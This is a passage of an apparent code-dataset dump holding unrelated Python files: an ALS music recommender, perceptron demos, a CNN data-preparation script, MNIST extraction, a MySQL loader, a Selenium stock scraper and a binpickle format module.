'title', 'prediction') \\\n .distinct() \\\n .orderBy('prediction', ascending=False) \\\n .show(10)\n\n## MAKING PREDICTIONS BASED ON 'SONGS LISTENED TO' AT LEAST TWICE\nplays_df_2more_plays = plays_df.join(user_als_id_LUT, 'userId') \\\n .join(song_als_id_LUT, 'songId') \\\n .filter(plays_df.Plays >= 2)\\\n .distinct()\n\ntotal_entries_2more = plays_df_2more_plays.count()\nprint('Total enties with two or more plays: {0}'.format(total_entries_2more))\n\nplays_df_2more_plays = plays_df_2more_plays.filter(plays_df_2more_plays.user_als_id < (unique_users)*0.8) \\\n .select('user_als_id', 'song_als_id', 'Plays')\nplays_df_2more_plays.cache()\n\n# We'll hold out 60% for training, 20% of our data for validation, and leave 20% for testing\nseed = 1800083193\n(split_01, split_02, split_03) = plays_df_2more_plays.randomSplit([0.6, 0.2, 0.2], seed = seed)\n\n# Let's cache these datasets for performance\ntrainset_2more = split_01.cache()\nvalidationset_2more = split_02.cache()\ntestset_2more = split_03.cache()\n\nprint('Training: {0}, validation: {1}, test: {2}\\n'.format(\n trainset_2more.count(), validationset_2more.count(), testset_2more.count())\n)\nvalidationset_2more = validationset_2more.withColumn(\"Plays\", validationset_2more[\"Plays\"].cast(DoubleType()))\ntest_2more = testset_2more.withColumn(\"Plays\", testset_2more[\"Plays\"].cast(DoubleType()))\n\ntrainset_2more.show(3)\nvalidationset_2more.show(3)\ntestset_2more.show(3)\n\n# Let's initialize our ALS learner\nals_2more = ALS()\n\n# Now set the parameters for the method\nals_2more.setMaxIter(2)\\\n .setSeed(seed)\\\n .setItemCol(\"song_als_id\")\\\n .setRatingCol(\"Plays\")\\\n .setUserCol(\"user_als_id\")\n\n# Now let's compute an evaluation metric for our test dataset\n# We Create an RMSE evaluator using the label and predicted columns\nreg_eval = RegressionEvaluator(predictionCol=\"prediction\", labelCol=\"Plays\", metricName=\"rmse\")\n\ntolerance = 0.03\nranks = [4, 8, 12, 16]\nregParams = [0.1, 0.15, 0.2, 0.25]\nerrors = [[0]*len(ranks)]*len(regParams)\nmodels = [[0]*len(ranks)]*len(regParams)\nerr = 0\nmin_error = float('inf')\nbest_rank = -1\ni = 0\nfor regParam in regParams:\n j = 0\n for rank in ranks:\n # Set the rank here:\n als_2more.setParams(rank = rank, regParam = regParam)\n # Create the model with these parameters.\n model = als_2more.fit(trainset_2more)\n # Run the model to create a prediction. Predict against the validation_df.\n predict_df = model.transform(validationset_2more)\n\n # Remove NaN values from prediction (due to SPARK-14489)\n predicted_plays_df = predict_df.filter(predict_df.prediction != float('nan'))\n predicted_plays_df = predicted_plays_df.withColumn(\"prediction\", F.abs(F.round(predicted_plays_df[\"prediction\"],0)))\n # Run the previously created RMSE evaluator, reg_eval, on the predicted_ratings_df DataFrame\n error = reg_eval.evaluate(predicted_plays_df)\n errors[i][j] = error\n models[i][j] = model\n print ('For rank %s, regularization parameter %s the RMSE is %s' % (rank, regParam, error))\n if error < min_error:\n min_error = error\n best_params = [i,j]\n j += 1\n i += 1\n\nals_2more.setRegParam(regParams[best_params[0]])\nals_2more.setRank(ranks[best_params[1]])\nprint ('The best model was trained with regularization parameter %s' % regParams[best_params[0]])\nprint ('The best model was trained with rank %s' % ranks[best_params[1]])\nmy_model_2more = models[best_params[0]][best_params[1]]\n\n#Testing the Model on the Test_2more Dataset\npredict_2more = my_model_2more.transform(test_2more)\n\n# Remove NaN values from prediction (due to SPARK-14489)\npredicted_test_2more = predict_2more.filter(predict_2more.prediction != float('nan'))\n\n# Round floats to whole numbers\npredicted_test_2more = predicted_test_2more.withColumn(\"prediction\", F.abs(F.round(predicted_test_2more[\"prediction\"],0)))\n# Run the previously created RMSE evaluator, reg_eval, on the predicted_test_df DataFrame\ntest2more_RMSE = reg_eval.evaluate(predicted_test_2more)\n\nprint('The model had a RMSE on the test set of {0}'.format(test2more_RMSE))\n\n#Comparing the Model\n##We again compare to selecting the average number of plays from the training dataset\navg_plays_2more = trainset_2more.groupBy().avg('Plays').select(F.round('avg(Plays)'))\n\navg_plays_2more.show(3)\n# Extract the average rating value. (This is row 0, column 0.)\ntrain_avg_plays2more = avg_plays_2more.collect()[0][0]\n\nprint('The average number of plays in the dataset is {0}'.format(train_avg_plays2more))\n\n# Add a column with the average rating\ntest_for_avg_2more = test_2more.withColumn('prediction', F.lit(train_avg_plays2more))\n\n# Run the previously created RMSE evaluator, reg_eval, on the test_for_avg_df DataFrame\ntest_avg_RMSE_2more = reg_eval.evaluate(test_for_avg_2more)\n\nprint(\"The RMSE on the average set is {0}\".format(test_avg_RMSE_2more))\n\n#PREDICTION FOR THE USER - 02\nUserID = 13\nsongs_listened = plays_df_2.filter(plays_df_2.user_als_id == UserID) \\\n .join(metadata_df, 'songId') \\\n .select('song_als_id', 'artist_name', 'title') \\\n \\\n# Generating List of Listened Songs\nlistened_songs_list = []\nfor song in songs_listened.collect():\n listened_songs_list.append(song['song_als_id'])\n\nprint('Songs user has listened to:')\nsongs_listened.select('artist_name', 'title').show()\n\n# generate dataframe of unlistened songs\nsongs_unlistened = plays_df_2.filter( ~ plays_df_2['song_als_id'].isin(listened_songs_list)) \\\n .select('song_als_id').withColumn('user_als_id', F.lit(UserID)).distinct()\n\n# feed unlistened songs into model\npredicted_listens = my_model_2more.transform(songs_unlistened)\n\n# remove NaNs\npredicted_listens = predicted_listens.filter(predicted_listens['prediction'] != float('nan'))\n\n# print output\nprint('Predicted Songs:')\npredicted_listens.join(plays_df_2, 'song_als_id') \\\n .join(metadata_df, 'songId') \\\n .select('artist_name', 'title', 'prediction') \\\n .distinct() \\\n .orderBy('prediction', ascending=False) \\\n .show(10)\n","sub_path":"Final_ALS_Model.py","file_name":"Final_ALS_Model.py","file_ext":"py","file_size_in_byte":15787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"644059178","text":"#!/usr/bin/env python\n\"\"\"\n @author: Jean-Lou Dupont\n\"\"\"\n__author__ = \"Jean-Lou Dupont\"\n__fileid__ = \"$Id: setup.py 39 2009-04-03 16:57:56Z jeanlou.dupont $\"\n__email = \"python (at) jldupont.com\"\n\nimport os\nimport sys\nfrom setuptools import setup, find_packages\n\nfrom pyjld.builder import findPackage, getShortAndLongDescription\n\n#helps with Eclipse external buidler\n__file__dir = os.path.dirname( __file__ )\nos.chdir(__file__dir)\n\npkg_path, ns, package = findPackage(__file__dir)\nthis_module_name = \"%s.%s\" % (ns, package)\nthis_package = __import__( this_module_name )\nthis_module = getattr(this_package, package)\nversion = this_module.__version__\n\nshort_description, long_description = getShortAndLongDescription(this_module) \n\n_doc_url = \"http://pyjld.googlecode.com/svn/trunk/%s.%s/tags/%s/docs/index.html\" % (ns,package,version)\n\ndist = setup(\n name = this_module_name,\n description = short_description,\n author_email = __email,\n author = __author__,\n url = _doc_url,\n long_description = long_description,\n version = this_module.__version__,\n package_data = {'':['*.*']},\n namespace_packages=[ns],\n package_dir = {'':'src'},\n packages = find_packages('src'),\n classifiers = this_module.__classifiers,\n install_requires = this_module.__dependencies,\n tests_require = [],\n #test_suite = ['tests.suite'],\n zip_safe = True,\n)\n\n","sub_path":"pyjld.phidgets/trunk/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"502534182","text":"#\n# tflite_webcam_image.py\n#\n# OpenCV - image capture and image manipulation \n# TensorFlow Lite - object classification using coco_ssd_mobilenet_v1_1.0 model\n# Kafka - send inferred meta data and annotated image to event stream\n#\n# Sanjeev Gupta, April 2020\n#\n\nimport os\nimport time\n\nfrom package import Config\nfrom package import Detector\nfrom package import OpenCV\nfrom package import VideoStream\nfrom package import util\n\nconfig = Config(resolution=(640, 480), framerate=30)\ndetector = Detector(config)\nopencv = OpenCV()\nvideostream = VideoStream(config).start()\n\n# Start mmsPoller in a different thread\nconfig.mmsPoller()\n\ntime.sleep(1)\n\nwhile True:\n # Get a frame in different states\n frame_current, frame_normalized, frame_faces, frame_gray = opencv.getFrame(config, detector, videostream)\n\n # Perform the actual inferencing with the initilized detector . tflite\n inference_interval = detector.infer(frame_normalized)\n\n # Get results\n boxes, classes, scores, num = detector.getResults()\n \n # Annotate the frame with class boundaries\n entities_dict = opencv.updateFrame(config, detector, opencv, frame_current, frame_faces, frame_gray, boxes, classes, scores, num)\n \n # Get full payload in json\n inference_data_json = detector.getInferenceDataJSON(config, inference_interval, entities_dict, frame_current)\n\n # Publish the result to kafka event stream\n if config.shouldPublishKafka():\n util.inference_publish(config.getPublishPayloadKafkaUrl(), inference_data_json)\n\n if config.shouldPublishStream():\n util.inference_publish(config.getPublishPayloadStreamUrl(), inference_data_json)\n\n # Update framerate\n opencv.updateFrameRate()\n\nvideostream.stop()\n","sub_path":"src/tflite/service/tflite_webcam_image.py","file_name":"tflite_webcam_image.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92620684","text":"import numpy as np\n\n# \n\ndef unit_step(v):\n \"\"\" Heavyside Step function. v must be a scalar \"\"\"\n if v >= 0:\n return 1\n else:\n return 0\n\ndef perceptron(x, w, b):\n# Function implemented by a perceptron with \n# weight vector w and bias b \"\"\"\n v = np.dot(w, x) + b\n y = unit_step(v)\n return y\n\ndef NOT_percep(x):\n return perceptron(x, w=-1, b=0.5)\n\ndef AND_percep(x):\n w = np.array([1, 1])\n b = -1.5\n return perceptron(x, w, b)\n\ndef NAND_percep(x):\n w = np.array([-1, -1])\n b = 1.5\n return perceptron(x, w, b)\n\n\ndef OR_percep(x):\n w = np.array([1, 1])\n b = -0.5\n return perceptron(x, w, b)\n\ndef XOR_net(x):\n gate_1 = NAND_percep(x)\n combine0 = np.array( [x[0],gate_1])\n\n gate_2 = NAND_percep(combine0)\n combine1 = np.array( [x[1],gate_1])\n\n gate_3 = NAND_percep(combine1)\n combine3 = np.array([gate_2, gate_3])\n\n output = NAND_percep(combine3)\n return output\n\n\n# Test\nexample1 = np.array([1, 1])\nexample2 = np.array([1, 0])\nexample3 = np.array([0, 1])\nexample4 = np.array([0, 0])\n\nprint(\"XOR({}, {}) = {}\".format(1, 1, XOR_net(example1)))\nprint(\"XOR({}, {}) = {}\".format(1, 0, XOR_net(example2)))\nprint(\"XOR({}, {}) = {}\".format(0, 1, XOR_net(example3)))\nprint(\"XOR({}, {}) = {}\".format(0, 0, XOR_net(example4)))\n","sub_path":"perceptrons/xor-from-nand.py","file_name":"xor-from-nand.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"354426788","text":"# %%\n\"\"\"\n

Perceptron implementation

\nby Vip Lab 116 - EE Dept. NCNU TW\n\"\"\"\n\n# %%\n\"\"\"\nnumpy lets us create vectors, and gives us both linear algebra functions and python list-like methods to use with it. We access its functions by calling them on np.\n\"\"\"\n\n# %%\nimport numpy as np\n\n# %%\n\"\"\"\nHere, we’re creating a new class Perceptron. This will, among other things, allow us to maintain state in order to use our perceptron after it has learned and assigned values to its weights.\n1. __init__ function
\nThe no_of_inputs is used to determine how many weights we need to learn.
\nThe threshold, is the number of epochs we’ll allow our learning algorithm to iterate through before ending, and it’s defaulted to 100.
\nThe learning_rate is used to determine the magnitude of change for our weights during each step through our training data, and is defaulted to 0.01.
\nInitialize a weight vector with an n-number of 0’s.
\n\n2. __predict__ method
\nf(x) = 1 if w · x + b > 0 : 0 otherwise
\ndot product function: np.dot(a, b) == a · b
\nf the summation from above is greater than 0, we store 1 in the variable activation, otherwise, activation = 0, then we return that value.
\n\n3. __train__ method: which takes two arguments: training_inputs and labels
\nThe labels is expected to be a numpy array of expected output values for each of the corresponding inputs in the training_inputs list.
\n\n\n\n\"\"\"\n\n# %%\nclass Perceptron(object):\n def __init__(self, no_of_inputs, threshold=100, learning_rate=0.01):\n self.threshold = threshold\n self.learning_rate = learning_rate\n self.weights = np.zeros(no_of_inputs + 1)\n \n def predict(self, inputs):\n summation = np.dot(inputs, self.weights[1:]) + self.weights[0]\n if summation > 0:\n activation = 1\n else:\n activation = 0 \n return activation\n \n def train(self, training_inputs, labels):\n for _ in range(self.threshold):\n for inputs, label in zip(training_inputs, labels):\n prediction = self.predict(inputs)\n self.weights[1:] += self.learning_rate * (label - prediction) * inputs\n self.weights[0] += self.learning_rate * (label - prediction)","sub_path":"W12-Perceptron/.ipynb_checkpoints/perceptron-checkpoint.py","file_name":"perceptron-checkpoint.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"166958271","text":"#!/usr/bin/python3\n\nimport os\nimport glob\nimport shutil\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom osgeo import gdal\n\nfrom cnn_exceptions import DatasetError\n\n\ndef read_images(data_dir, tensor_shape=(256, 256),\n filter_by_class=None, verbose=1):\n \"\"\"Read images and return them as tensors and lists of filenames.\n\n :param data_dir: path to the directory containing images\n :param tensor_shape: shape of the first two dimensions of input tensors\n :param verbose: verbosity (0=quiet, >0 verbose)\n :param filter_by_class: classes of interest (if specified, only samples\n containing at least one of them will be created)\n :return: image_tensors, masks_tensors\n \"\"\"\n images_arrays = []\n masks_arrays = []\n for i in glob.glob(os.path.join(data_dir, '*image.tif')):\n tiled = tile(i, i.replace('image.tif', 'label.tif'),\n tensor_shape, filter_by_class)\n images_arrays.extend(tiled[0])\n masks_arrays.extend(tiled[1])\n\n if len(images_arrays) == 0:\n raise DatasetError('No training samples created. Check the size of '\n 'the images in the data_dir or the appearance of '\n 'the classes you are interested in in labels')\n\n if masks_arrays[0].ndim == 2:\n masks_arrays = [np.expand_dims(i, -1) for i in masks_arrays]\n\n # create TF datasets\n images_dataset = tf.data.Dataset.from_tensor_slices(images_arrays)\n masks_dataset = tf.data.Dataset.from_tensor_slices(masks_arrays)\n\n im_nr = len(images_arrays)\n if verbose > 0:\n print('Created {} training samples from the provided '\n 'image.'.format(im_nr))\n\n return images_dataset, masks_dataset\n\n\ndef parse_label_code(line):\n \"\"\"Parse lines in a text file into a label code and a label name.\n\n :param line: line in the txt file\n :return: tuple with an integer label code, a string label name\n \"\"\"\n a, b = line.strip().split(',')\n\n # format label_value, label_name\n return int(a), b\n\n\ndef generate_dataset_structure(data_dir, nr_bands=12, tensor_shape=(256, 256),\n val_set_pct=0.2, filter_by_class=None,\n verbose=1):\n \"\"\"Generate the expected dataset structure.\n\n Will generate directories train_images, train_masks, val_images and\n val_masks.\n\n :param data_dir: path to the directory containing images\n :param nr_bands: number of bands of intended input images\n :param tensor_shape: shape of the first two dimensions of input tensors\n :param val_set_pct: percentage of the validation images in the dataset\n :param filter_by_class: classes of interest (if specified, only samples\n containing at least one of them will be created)\n :param verbose: verbosity (0=quiet, >0 verbose)\n \"\"\"\n # function to be used while saving samples\n def train_val_determination(val_set_pct):\n \"\"\"Return decision about the sample will be part of train or val set.\"\"\"\n pct = 0\n while True:\n pct += val_set_pct\n if pct < 1:\n yield 'train'\n else:\n pct -= 1\n yield 'val'\n\n # Create folders to hold images and masks\n dirs = ['train_images', 'train_masks', 'val_images', 'val_masks']\n\n for directory in dirs:\n dir_full_path = os.path.join(data_dir, directory)\n if os.path.isdir(dir_full_path):\n shutil.rmtree(dir_full_path)\n\n os.makedirs(dir_full_path)\n\n images, masks = read_images(data_dir, tensor_shape, filter_by_class)\n\n # TODO: would be nice to avoid tf.compat.v1 (stay v2) (what about my\n # generator?)\n # Create iterators for images and masks\n # outside of TF Eager, we would use make_one_shot_iterator\n frame_batches = tf.compat.v1.data.make_one_shot_iterator(images)\n mask_batches = tf.compat.v1.data.make_one_shot_iterator(masks)\n\n driver = gdal.GetDriverByName('GTiff')\n\n # Iterate over the images while saving the images and masks\n # in appropriate folders\n im_id = 0\n dir_names = train_val_determination(val_set_pct)\n for image, mask in zip(frame_batches, mask_batches):\n # TODO: Experiment with uint16\n # Convert tensors to numpy arrays\n image = (image.numpy() / 255).astype(np.uint8)\n mask = mask.numpy().astype(np.uint8)\n\n # TODO: Avoid two transpositions\n image = np.transpose(image, (2, 0, 1))\n mask = np.transpose(mask, (2, 0, 1))\n # TODO: https://stackoverflow.com/questions/53776506/how-to-save-an-array-representing-an-image-with-40-band-to-a-tif-file\n\n dir_name = next(dir_names)\n image_path = os.path.join(data_dir,\n '{}_images'.format(dir_name),\n 'image_{0:03d}.tif'.format(im_id + 1))\n mask_path = os.path.join(data_dir,\n '{}_masks'.format(dir_name),\n 'image_{0:03d}.tif'.format(im_id + 1))\n\n # write rasters\n dout = driver.Create(image_path, tensor_shape[0],\n tensor_shape[1], nr_bands, gdal.GDT_UInt16)\n for i in range(nr_bands):\n dout.GetRasterBand(i + 1).WriteArray(image[i])\n\n dout = driver.Create(mask_path, tensor_shape[0],\n tensor_shape[1], 1, gdal.GDT_UInt16)\n for i in range(1):\n dout.GetRasterBand(i + 1).WriteArray(mask[i])\n\n im_id += 1\n\n if verbose > 0:\n print(\"Saved {} images to directory {}\".format(im_id, data_dir))\n\n\ndef tile(scene_path, labels_path, tensor_shape, filter_by_class=None):\n \"\"\"Tile the big scene into smaller samples.\n\n If filter_by_class is not None, only samples containing at least one of\n these classes of interest will be returned.\n\n :param scene_path: path to the image to be cut\n :param labels_path: path to the image with labels to be cut\n :param tensor_shape: shape of the first two dimensions of input tensors\n :param filter_by_class: classes of interest (if specified, only samples\n containing at least one of them will be returned)\n :return:\n \"\"\"\n import pyjeo as pj\n\n # do we filter by classes?\n if filter_by_class is None:\n filt = False\n else:\n filter_by_class = [int(i) for i in filter_by_class.split(',')]\n filt = True\n\n scene_nps = []\n labels_nps = []\n\n # load images\n scene = pj.Jim(scene_path)\n labels = pj.Jim(labels_path)\n\n nr_col = scene.properties.nrOfCol()\n nr_row = scene.properties.nrOfRow()\n cols_step = tensor_shape[0]\n rows_step = tensor_shape[1]\n\n for i in range(0, nr_col, cols_step):\n for j in range(0, nr_row, rows_step):\n # if reaching the end of the image, expand the window back to\n # avoid pixels outside the image\n if j + rows_step > nr_row:\n j = nr_row - rows_step\n if i + cols_step > nr_col:\n i = nr_col - cols_step\n\n # crop images\n scene_cropped = pj.geometry.crop(scene, ulx=i, uly=j,\n lrx=i + cols_step,\n lry=j + rows_step,\n nogeo=True)\n labels_cropped = pj.geometry.crop(labels, ulx=i, uly=j,\n lrx=i + cols_step,\n lry=j + rows_step,\n nogeo=True)\n\n if filt is False or \\\n any(i in labels_cropped.np() for i in filter_by_class):\n # stack bands\n scene_np = np.stack(\n [scene_cropped.np(i) for i in\n range(scene_cropped.properties.nrOfBand())],\n axis=2)\n labels_np = pj.jim2np(labels_cropped)\n\n scene_nps.append(scene_np)\n labels_nps.append(labels_np)\n\n return scene_nps, labels_nps\n","sub_path":"src/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":8084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"607771064","text":"import pymysql\nimport pandas as pd\nimport datetime\ndata = pd.read_table('weekendDate.txt',sep='\\s+', encoding = 'gb2312')\n\n#%%\n#将获取到的数据插入数据库\n# 连接database\nconn = pymysql.connect(host=\"localhost\", user=\"root\",password=\"123456\",database=\"shixi\",charset=\"utf8\")\n# 得到一个可以执行SQL语句的光标对象\ncursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n#如果没有数据表要进行生成\nsql_create1 =\" CREATE TABLE IF NOT EXISTS `WeekendSpecial`\\\n (\\\n `title` VARCHAR(100) NOT NULL,\\\n `detail` VARCHAR(40) NOT NULL,\\\n `herf` VARCHAR(100) NOT NULL,\\\n `upgrade_date` DATE\\\n )\\\n ENGINE=InnoDB DEFAULT CHARSET=utf8;\"\ncursor.execute(sql_create1)\n#批量插入数据\nsql_country = \"INSERT INTO WeekendSpecial VALUES (%s, %s, %s, %s)\"\nfor i in range(len(data)):\n a = data['Title'][i]\n b = data['Detail'][i]\n c = data['herf'][i]\n d = datetime.datetime.now().strftime('%Y-%m-%d')\n values = (a, b, c, d)#在从也可以进行插入数据格式修改\n cursor.execute(sql_country,values)\n#在插入完数据之后,将最近跟新的数据覆盖掉之前有的数据,也就是查找重复,如果时间越早则删除记录\nconn.commit()\nsql_delete_weekend=\" delete from WeekendSpecial where (title,upgrade_date) in (select title,n from(select title,min(upgrade_date)as n,count(*) as c from WeekendSpecial group by `title` having c>1)as t)\"\ncursor.execute(sql_delete_weekend)\n# 执行SQL语句\nconn.commit()\n# 关闭光标对象\ncursor.close()\n# 关闭数据库连接\nconn.close()\nprint('done')","sub_path":"周末专题/sqlWrite.py","file_name":"sqlWrite.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"168536072","text":"from . import DynamoDBApi\nfrom . import agentConfig\n\n\nclass ConfigController:\n def __init__(self):\n self.__agent = agentConfig.agent\n self.__dynamodbApi = DynamoDBApi.DynamoDBApi()\n\n def updateAiConfig(self,aiConfigData):\n aiDynamoDbConfigData = {\n \"agent\":self.__agent,\n \"aiApp\":aiConfigData['aiApp'],\n \"key\":aiConfigData['key'],\n \"value\":aiConfigData['value']\n }\n\n self.__dynamodbApi.updateAiDynamoDbConfig(aiDynamoDbConfigData)\n\n def retrieveAiConfig(self,aiApp):\n aiConfigData = self.__dynamodbApi.retrieveAiConfig(self.__agent, aiApp)\n return aiConfigData","sub_path":"module/ConfigController.py","file_name":"ConfigController.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"487655807","text":"import os\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nimport cv2\nimport numpy as np\n\n\nmnist = input_data.read_data_sets('MNIST_data/', one_hot=False)\n\n\ndef extract_mnist_data(xx='train', num=30):\n if xx == 'train':\n images = mnist.train.images\n labels = mnist.train.labels\n else:\n if xx == 'test':\n images = mnist.test.images\n labels = mnist.test.labels\n else:\n print('error!')\n return\n\n sess = tf.Session()\n # 获取图片总数\n shape_images = sess.run(tf.shape(images))\n images_count = shape_images[0]\n pixels_per_image = shape_images[1]\n # 获取标签总数\n shape_labels = sess.run(tf.shape(labels))\n labels_count = shape_labels[0]\n # 检查数据集是否符合预期格式\n assert images_count == labels_count\n assert shape_labels.size == 1\n\n print('数据集共包含 : {} 张图片, {} 个标签'.format(images_count, labels_count))\n print('每张图片包含 : {} 个像素'.format(pixels_per_image))\n print('数据类型为 :{} '.format(images.dtype))\n\n images_data = images[0:num][:]\n labels_data = labels[0:num]\n\n # 创建数字图片的保存目录\n save_dir = 'MNIST_images/' + xx\n for i in range(10):\n dir_img = '{}/{}/'.format(save_dir, i)\n if not os.path.exists(dir_img):\n print('目录 ''{}'' 不存在!自动创建该目录...'.format(dir_img))\n os.makedirs(dir_img)\n\n # 生成图片\n for i in range(num):\n img_1d = images_data[i] * 255\n img_2d = img_1d.reshape(28, 28)\n\n dir_img = '{}/{}/'.format(save_dir, labels_data[i])\n name_img = '{}.jpg'.format(i)\n\n cv2.imwrite(dir_img + name_img, img_2d)\n\nextract_mnist_data('train')\nextract_mnist_data('test')","sub_path":"tensorflow/tl00_mnist_img_extract.py","file_name":"tl00_mnist_img_extract.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"58175779","text":"from Dequeue import *\n\ndq = DeQueue()\n\nstri = input(\"Enter a string\")\ntoChar = list(stri)\nfor i in toChar:\n dq.add_Rear(i)\nprint(toChar)\ndq.show()\nsize = len(toChar)\nsh = size / 2\nj=0\nflag = 1\nif size%2 == 0:\n sh = size/2\nelse:\n sh = size/2 - 1\n\nwhile j<=sh:\n front = dq.rem_Front()\n print(front,\"removed\", end=\" \")\n rear = dq.remv_Rear()\n print(rear,\"removed\")\n dq.show()\n\n if front == rear:\n flag = 1\n else:\n flag = 0\n break\n\nif flag == 1:\n print(\"String is palindrome\")\nelse:\n print(\"String is not palindrome\")\n\n\n","sub_path":"Week2/palindromeQueue.py","file_name":"palindromeQueue.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"314220532","text":"# -*- coding: utf-8 -*-\r\nimport lxml.html\r\nimport traceback\r\nfrom selenium import webdriver\r\nfrom time import sleep\r\n\r\nUrl = 'https://stocks.finance.yahoo.co.jp/'\r\nstock_code=['1301','7201','7203','998407']\r\n\r\ndriver = webdriver.Chrome(executable_path=\"./chromedriver.exe\")\r\ndriver.get(Url)#Webページの取得\r\n\r\ntry:\r\n for stock in stock_code:\r\n search_txt = driver. find_element_by_id(\"searchText\")\r\n search_btn = driver. find_element_by_id(\"searchButton\")\r\n search_txt.send_keys(stock) #検索用のインプットボックスに銘柄コードを設定\r\n search_btn.click() #検索ボタンを押します\r\n\r\n sleep(2) #ページの切替わりを待ちます。(とりあえず2秒)\r\n root = lxml.html.fromstring(driver.page_source) #Seleniumからページを取得し、Parserで変換\r\n\r\n company_name = root.xpath(\"//h1/text()\")[0]\t\t\t\t#会社名\r\n stock_price = root.xpath(\"//td[@class='stoksPrice']/text()\")[0]\t\t#株価\r\n print(company_name)\r\n print(stock_price)\r\nexcept:\r\n print(traceback.format_exc())\r\nfinally:\r\n driver.close()\r\n driver.quit()\r\n","sub_path":"yahoofinance_scraping.py","file_name":"yahoofinance_scraping.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"172065052","text":"# adult_ohe_logres.py\nimport pandas as pd \n\nfrom sklearn import linear_model\nfrom sklearn import preprocessing\nfrom sklearn import metrics\n\ndef run(fold):\n # load the full training data with folds\n df = pd.read_csv('../dataset/adult_folds.csv')\n\n # list of numerical columns\n num_cols = [\n 'fnlwgt' , \n 'age',\n 'capital.gain',\n 'capital.loss',\n 'hours.per.week'\n ]\n\n # drop numerical clumns\n df = df.drop(num_cols , axis = 1)\n\n # map target to 0s and 1s\n target_mapping = {\n ' <=50K' : 0,\n ' >50K' : 1\n }\n\n df.loc[:, 'income'] = df.income.map(target_mapping)\n\n # all columns are features except income and kfold columns\n\n features = [\n f for f in df.columns if f not in ('income' , 'kfold')\n ]\n\n # fill all NaN values with NONE\n # since all the features are categorical so converting them into string\n for col in features:\n df.loc[:,col] = df[col].astype(str).fillna('NONE')\n\n # getting training data using folds\n df_train = df[df.kfold != fold].reset_index(drop = True)\n\n # getting validation data using folds\n df_valid = df[df.kfold == fold].reset_index(drop = True)\n\n # intialize OneHotEncoder from sklearn\n ohe = preprocessing.OneHotEncoder()\n\n # fit ohe on training + validation features\n full_data = pd.concat(\n [df_train[features] , df_valid[features]] , \n axis = 0\n )\n ohe.fit(full_data[features])\n\n # transform training data\n x_train = ohe.transform(df_train[features])\n\n # transform validation data\n x_valid = ohe.transform(df_valid[features])\n\n # initialize Logistic Regression model\n model = linear_model.LogisticRegression()\n\n # fit model on training data set\n model.fit(x_train , df_train.income.values)\n\n # predict on validation dataset \n # We need the probability values as we are calculating AUC\n # we will use the probabilty of 1s \n valid_preds = model.predict_proba(x_valid)[:,1]\n\n # get roc auc score\n auc = metrics.roc_auc_score(df_valid.income.values , valid_preds)\n\n # print auc\n print(f\"Fold = {fold} , AUC = {auc}\")\n\n\nif __name__ == \"__main__\":\n for fold_ in range(5):\n run(fold_)","sub_path":"src/adult_ohe_logres.py","file_name":"adult_ohe_logres.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"254242204","text":"\"\"\"\nConstants and functions defining the binpickle format.\n\"\"\"\n\nimport struct\nfrom typing import NamedTuple\n\nMAGIC = b'BPCK'\nVERSION = 1\nHEADER_FORMAT = struct.Struct('!4sHHq')\nTRAILER_FORMAT = struct.Struct('!QLL')\n\n\nclass FileHeader(NamedTuple):\n \"\"\"\n File header for a BinPickle file. The header is a 16-byte sequence containing the\n magic (``BPCK``) followed by version and offset information:\n\n 1. File version (2 bytes, big-endian). Currently only version 1 exists.\n 2. Reserved (2 bytes). Set to 0.\n 3. File length (8 bytes, big-endian). Length is signed; if the file length is not known,\n this field is set to -1.\n \"\"\"\n version: int = VERSION\n \"The NumPy file version.\"\n length: int = -1\n \"The length of the file (-1 for unknown).\"\n\n def encode(self):\n \"Encode the file header as bytes.\"\n return HEADER_FORMAT.pack(MAGIC, self.version, 0, self.length)\n\n @classmethod\n def decode(cls, buf, *, verify=True):\n \"Decode a file header from bytes.\"\n m, v, pad, off = HEADER_FORMAT.unpack(buf)\n if verify and m != MAGIC:\n raise ValueError('invalid magic {}'.format(m))\n if verify and v != VERSION:\n raise ValueError('invalid version {}'.format(v))\n if verify and pad != 0:\n raise ValueError('invalid padding')\n return cls(v, off)\n\n @classmethod\n def read(cls, file, **kwargs):\n buf = file.read(HEADER_FORMAT.size)\n return cls.decode(buf, **kwargs)\n\n def trailer_pos(self):\n \"Get the position of the start of the file trailer.\"\n if self.length >= HEADER_FORMAT.size + TRAILER_FORMAT.size:\n return self.length - TRAILER_FORMAT.size\n elif self.length > 0:\n raise ValueError('file size {} not enough for BinPickle'.format(self.length))\n else:\n return None # We do not know the file size\n\n\nclass FileTrailer(NamedTuple):\n \"\"\"\n File trailer for a BinPickle file. The trailer is a 16-byte sequence that tells the\n reader where to find the rest of the binpickle data. It consists of the following\n fields:\n\n 1. Index start (8 bytes, big-endian). Measured in bytes from the start of the file.\n 2. Index length 